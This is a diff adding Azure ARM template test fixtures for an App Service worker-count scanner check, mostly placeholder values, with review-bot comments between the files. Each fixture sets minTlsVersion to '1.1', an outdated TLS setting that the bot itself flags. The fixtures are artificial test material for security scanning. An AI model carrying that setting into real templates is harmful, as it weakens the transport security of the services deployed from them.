@@ -0,0 +1,330 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "webAppName": { + "type": "string", + "defaultValue": "AzureLinuxApp", + "metadata": { + "description": "Base name of the resource such as web app name and app service plan " + }, + "minLength": 2 + }, + "sku": { + "type": "string", + "defaultValue": "S1", + "metadata": { + "description": "The SKU of App Service Plan " + } + }, + "linuxFxVersion": { + "type": "string", + "defaultValue": "php|7.0", + "metadata": { + "description": "The Runtime stack of current web app" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]", + "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]" + }, + "resources": [ + { + "type": "Microsoft.Web/sites", + "apiVersion": "2022-09-01", + "name": "pass", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "kind": "string", + "extendedLocation": { + "name": "string" + }, + "identity": { + "type": "string", + "userAssignedIdentities": {} + }, + "properties": { + "clientAffinityEnabled": "bool", + "clientCertEnabled": "bool", + "clientCertExclusionPaths": "string", + "clientCertMode": "string", + "cloningInfo": { + "appSettingsOverrides": {}, + "cloneCustomHostNames": "bool", + "cloneSourceControl": "bool", + "configureLoadBalancing": "bool", + "correlationId": "string", + "hostingEnvironment": "string", + "overwrite": "bool", + "sourceWebAppId": "string", + "sourceWebAppLocation": "string", + "trafficManagerProfileId": "string", + "trafficManagerProfileName": "string" + }, + "containerSize": "int", + "customDomainVerificationId": "string", + "dailyMemoryTimeQuota": "int", + "enabled": "bool", + 
"hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "hostNameSslStates": [ + { + "hostType": "string", + "name": "string", + "sslState": "string", + "thumbprint": "string", + "toUpdate": "bool", + "virtualIP": "string" + } + ], + "httpsOnly": "bool", + "hyperV": "bool", + "isXenon": "bool", + "keyVaultReferenceIdentity": "string", + "managedEnvironmentId": "string", + "publicNetworkAccess": "string", + "redundancyMode": "string", + "reserved": "bool", + "scmSiteAlsoStopped": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", + "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + "exe": "string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "string" + ], + "supportCredentials": "bool" + }, + 
"defaultDocuments": [ + "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "string", + "http20Enabled": "bool", + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "1.1", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": 2, + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + "kind": "string", + "properties": { + 
"dynamicTagsJson": "string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "string", + "remoteDebuggingEnabled": "bool", + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + "virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + "virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } + } + ] +} + diff --git a/tests/arm/checks/resource/example_AppServiceInstanceMinimum/pass2.json b/tests/arm/checks/resource/example_AppServiceInstanceMinimum/pass2.json new file mode 100644 index 00000000000..f947c2aedc7 --- /dev/null +++ b/tests/arm/checks/resource/example_AppServiceInstanceMinimum/pass2.json 
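Review bot: The pass fixture hard-codes `"minTlsVersion": "1.1"` inside siteConfig, a concrete insecure value in a template that is otherwise all `"string"`/`"bool"`/`"int"` placeholders and that is meant to represent a compliant resource. Nothing visible here suggests the instance-minimum check reads that field, but these fixtures get copied and re-scanned by other checks, so an unrelated TLS finding is a trap for the next person; replace it with the placeholder `"minTlsVersion": "string"` (or a compliant `"1.2"`) so the only concrete value is the `"numberOfWorkers": 2` the check is about. If the threshold is two workers, as this value and the `"numberOfWorkers": 0` in the fail fixture above suggest, a boundary fixture with `"numberOfWorkers": 1` expected to fail would pin the comparison; I cannot see the check's code from this hunk.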
@@ -0,0 +1,330 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "webAppName": { + "type": "string", + "defaultValue": "AzureLinuxApp", + "metadata": { + "description": "Base name of the resource such as web app name and app service plan " + }, + "minLength": 2 + }, + "sku": { + "type": "string", + "defaultValue": "S1", + "metadata": { + "description": "The SKU of App Service Plan " + } + }, + "linuxFxVersion": { + "type": "string", + "defaultValue": "php|7.0", + "metadata": { + "description": "The Runtime stack of current web app" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]", + "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]" + }, + "resources": [ + { + "type": "Microsoft.Web/sites/slots", + "apiVersion": "2022-09-01", + "name": "pass2", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "kind": "string", + "extendedLocation": { + "name": "string" + }, + "identity": { + "type": "string", + "userAssignedIdentities": {} + }, + "properties": { + "clientAffinityEnabled": "bool", + "clientCertEnabled": "bool", + "clientCertExclusionPaths": "string", + "clientCertMode": "string", + "cloningInfo": { + "appSettingsOverrides": {}, + "cloneCustomHostNames": "bool", + "cloneSourceControl": "bool", + "configureLoadBalancing": "bool", + "correlationId": "string", + "hostingEnvironment": "string", + "overwrite": "bool", + "sourceWebAppId": "string", + "sourceWebAppLocation": "string", + "trafficManagerProfileId": "string", + "trafficManagerProfileName": "string" + }, + "containerSize": "int", + "customDomainVerificationId": "string", + "dailyMemoryTimeQuota": "int", + "enabled": "bool", + 
"hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "hostNameSslStates": [ + { + "hostType": "string", + "name": "string", + "sslState": "string", + "thumbprint": "string", + "toUpdate": "bool", + "virtualIP": "string" + } + ], + "httpsOnly": "bool", + "hyperV": "bool", + "isXenon": "bool", + "keyVaultReferenceIdentity": "string", + "managedEnvironmentId": "string", + "publicNetworkAccess": "string", + "redundancyMode": "string", + "reserved": "bool", + "scmSiteAlsoStopped": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", + "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + "exe": "string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "string" + ], + "supportCredentials": "bool" + }, + 
"defaultDocuments": [ + "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "string", + "http20Enabled": "bool", + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "1.1", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": 3, + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + "kind": "string", + "properties": { + 
"dynamicTagsJson": "string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "string", + "remoteDebuggingEnabled": "bool", + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + "virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + "virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } + } + ] +} + diff --git a/tests/arm/checks/resource/example_AppServiceInstanceMinimum/unknown.json b/tests/arm/checks/resource/example_AppServiceInstanceMinimum/unknown.json new file mode 100644 index 00000000000..2b2f7df4fc7 --- /dev/null +++ b/tests/arm/checks/resource/example_AppServiceInstanceMinimum/unknown.json 
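Review bot: This slot fixture is a 330-line copy of pass.json that differs only in `"type": "Microsoft.Web/sites/slots"`, `"name": "pass2"` and `"numberOfWorkers": 3`, so the property under test is buried in roughly three hundred placeholder lines copied from the ARM reference. Trimming each InstanceMinimum fixture to the resource envelope plus `properties.siteConfig.numberOfWorkers`, the way the PHPVersion fixtures further down are written, would make the pass/fail/unknown variants reviewable side by side. The copied placeholders also carry the same concrete `"minTlsVersion": "1.1"` into every variant, which is the kind of value a later check will key on and report against a fixture that claims to be compliant.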
@@ -0,0 +1,330 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "webAppName": { + "type": "string", + "defaultValue": "AzureLinuxApp", + "metadata": { + "description": "Base name of the resource such as web app name and app service plan " + }, + "minLength": 2 + }, + "sku": { + "type": "string", + "defaultValue": "S1", + "metadata": { + "description": "The SKU of App Service Plan " + } + }, + "linuxFxVersion": { + "type": "string", + "defaultValue": "php|7.0", + "metadata": { + "description": "The Runtime stack of current web app" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]", + "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]" + }, + "resources": [ + { + "type": "Microsoft.Web/sites", + "apiVersion": "2022-09-01", + "name": "unknown", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "kind": "string", + "extendedLocation": { + "name": "string" + }, + "identity": { + "type": "string", + "userAssignedIdentities": {} + }, + "properties": { + "clientAffinityEnabled": "bool", + "clientCertEnabled": "bool", + "clientCertExclusionPaths": "string", + "clientCertMode": "string", + "cloningInfo": { + "appSettingsOverrides": {}, + "cloneCustomHostNames": "bool", + "cloneSourceControl": "bool", + "configureLoadBalancing": "bool", + "correlationId": "string", + "hostingEnvironment": "string", + "overwrite": "bool", + "sourceWebAppId": "string", + "sourceWebAppLocation": "string", + "trafficManagerProfileId": "string", + "trafficManagerProfileName": "string" + }, + "containerSize": "int", + "customDomainVerificationId": "string", + "dailyMemoryTimeQuota": "int", + "enabled": "bool", + 
"hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "hostNameSslStates": [ + { + "hostType": "string", + "name": "string", + "sslState": "string", + "thumbprint": "string", + "toUpdate": "bool", + "virtualIP": "string" + } + ], + "httpsOnly": "bool", + "hyperV": "bool", + "isXenon": "bool", + "keyVaultReferenceIdentity": "string", + "managedEnvironmentId": "string", + "publicNetworkAccess": "string", + "redundancyMode": "string", + "reserved": "bool", + "scmSiteAlsoStopped": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", + "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + "exe": "string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "string" + ], + "supportCredentials": "bool" + }, + 
"defaultDocuments": [ + "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "string", + "http20Enabled": "bool", + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "1.1", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": false, + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + "kind": "string", + "properties": { + 
"dynamicTagsJson": "string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "string", + "remoteDebuggingEnabled": "bool", + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + "virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + "virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } + } + ] +} + diff --git a/tests/arm/checks/resource/example_AppServiceInstanceMinimum/unknown2.json b/tests/arm/checks/resource/example_AppServiceInstanceMinimum/unknown2.json new file mode 100644 index 00000000000..bb5ab80468d --- /dev/null +++ b/tests/arm/checks/resource/example_AppServiceInstanceMinimum/unknown2.json 
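Review bot: The only unknown case exercised is `"numberOfWorkers": false`, a JSON boolean the ARM schema would not accept, while the realistic unknown input — an ARM expression such as `"numberOfWorkers": "[parameters('workerCount')]"` that the scanner cannot resolve — is not covered. That expression form is how production templates set this value, so it is the case most likely to regress into a false FAILED or PASSED; a further fixture with it expected UNKNOWN would pin it. A fixture where `numberOfWorkers` is absent from `siteConfig` entirely is also missing, and whether absence should be FAILED or UNKNOWN is not visible from this hunk — that decision deserves a fixture and a comment in the check either way.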
@@ -0,0 +1,330 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "webAppName": { + "type": "string", + "defaultValue": "AzureLinuxApp", + "metadata": { + "description": "Base name of the resource such as web app name and app service plan " + }, + "minLength": 2 + }, + "sku": { + "type": "string", + "defaultValue": "S1", + "metadata": { + "description": "The SKU of App Service Plan " + } + }, + "linuxFxVersion": { + "type": "string", + "defaultValue": "php|7.0", + "metadata": { + "description": "The Runtime stack of current web app" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]", + "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]" + }, + "resources": [ + { + "type": "Microsoft.Web/sites/slots", + "apiVersion": "2022-09-01", + "name": "unknown2", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "kind": "string", + "extendedLocation": { + "name": "string" + }, + "identity": { + "type": "string", + "userAssignedIdentities": {} + }, + "properties": { + "clientAffinityEnabled": "bool", + "clientCertEnabled": "bool", + "clientCertExclusionPaths": "string", + "clientCertMode": "string", + "cloningInfo": { + "appSettingsOverrides": {}, + "cloneCustomHostNames": "bool", + "cloneSourceControl": "bool", + "configureLoadBalancing": "bool", + "correlationId": "string", + "hostingEnvironment": "string", + "overwrite": "bool", + "sourceWebAppId": "string", + "sourceWebAppLocation": "string", + "trafficManagerProfileId": "string", + "trafficManagerProfileName": "string" + }, + "containerSize": "int", + "customDomainVerificationId": "string", + "dailyMemoryTimeQuota": "int", + "enabled": "bool", + 
"hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "hostNameSslStates": [ + { + "hostType": "string", + "name": "string", + "sslState": "string", + "thumbprint": "string", + "toUpdate": "bool", + "virtualIP": "string" + } + ], + "httpsOnly": "bool", + "hyperV": "bool", + "isXenon": "bool", + "keyVaultReferenceIdentity": "string", + "managedEnvironmentId": "string", + "publicNetworkAccess": "string", + "redundancyMode": "string", + "reserved": "bool", + "scmSiteAlsoStopped": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", + "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + "exe": "string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "string" + ], + "supportCredentials": "bool" + }, + 
"defaultDocuments": [ + "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "string", + "http20Enabled": "bool", + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "1.1", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": true, + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + "kind": "string", + "properties": { + 
"dynamicTagsJson": "string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "string", + "remoteDebuggingEnabled": "bool", + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + "virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + "virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } + } + ] +} + diff --git a/tests/arm/checks/resource/example_AppServiceJavaVersion/fail.json b/tests/arm/checks/resource/example_AppServiceJavaVersion/fail.json new file mode 100644 index 00000000000..9c56d83f5d5 --- /dev/null +++ b/tests/arm/checks/resource/example_AppServiceJavaVersion/fail.json 
